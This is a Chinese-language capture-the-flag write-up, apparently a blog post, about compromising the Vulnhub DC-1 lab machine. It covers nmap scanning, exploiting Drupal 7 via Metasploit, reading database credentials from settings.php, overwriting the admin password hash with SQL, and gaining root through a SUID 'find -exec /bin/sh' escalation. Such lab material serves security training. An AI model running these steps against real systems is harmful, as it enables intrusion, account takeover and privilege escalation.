Vulnhub靶场实战———DC1

环境下载

DC and Five86 Series Challenges - DC-1

 环境配置

信息收集

nmap -sP 192.168.100.0/24

 进一步端口探测

nmap -sV -A -p- 192.168.100.12

 发现开发了80端口

FLAG1

我们进去看一看,尝试一些弱口令爆破等都失败

但是我们注意到此网页所使用的CMS为Drupal 7 版本,我们尝试搜索一下他的网站漏洞

我们 直接使用Metasploit 尝试搜索,发现可利用漏洞

我们直接使用

shell生成虚拟终端

 

通过ls获取到FLAG1文件

根据flag1的提示,我们需要查看 cms 的 config 文件,加下来就是找到 config 文件查看,获取下一条信息

FLAG2

我们通过find命令找到文件

find / -name settings.php

我们直接查看此文件,发现了flag2文件内容

 flag2的提示内容感觉没什么用,我们再往下看看可以看大这个文件中有数据库的账号密码,我们尝试用此登录数据库

账号:dbuser
密码:R0ck3t

登录mysql

mysql -u dbuser -p

 登录成功,查看数据库

 

查看表

存在user表,查看该表字段

 查看字段内容

select uid,name,pass
from user;

 找到了用户名以及密码,但这密码是加密过的,想办法解密

猜测存在本地加密文件,我们搜索一下

find / -name "*pass*"

 找到了这个文件

使用方法:

php scripts/password-hash.sh 密码

 我们得到了123456的加密后结果,我们可以将其覆盖在数据库的一条密码上

我们进入数据库

UPDATE users SET pass="$S$DS6uKNmdpYCcgbdHEpADltHsdMxqCfzxaXHOt.4yn5rSjHCMWRj9" where uid=1 ;

覆盖完成,我们去网站登录界面登录账号 

 成功找到flag3文件

flag3提示接下来需要用到exec以及shell

FLAG4

我们继续使用查找命令

find / -name "flag4*"

找到flag文件,查看一下 

flag4提示我们可能需要root权限

接下来我们尝试一种提权方法

FLAG5

先创建文件,再使用 find 提权 

touch 111
find 111 -exec '/bin/sh' \;

提权成功 ,进入 root 目录,查看最终的 flag文件

成功获取,结束! 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值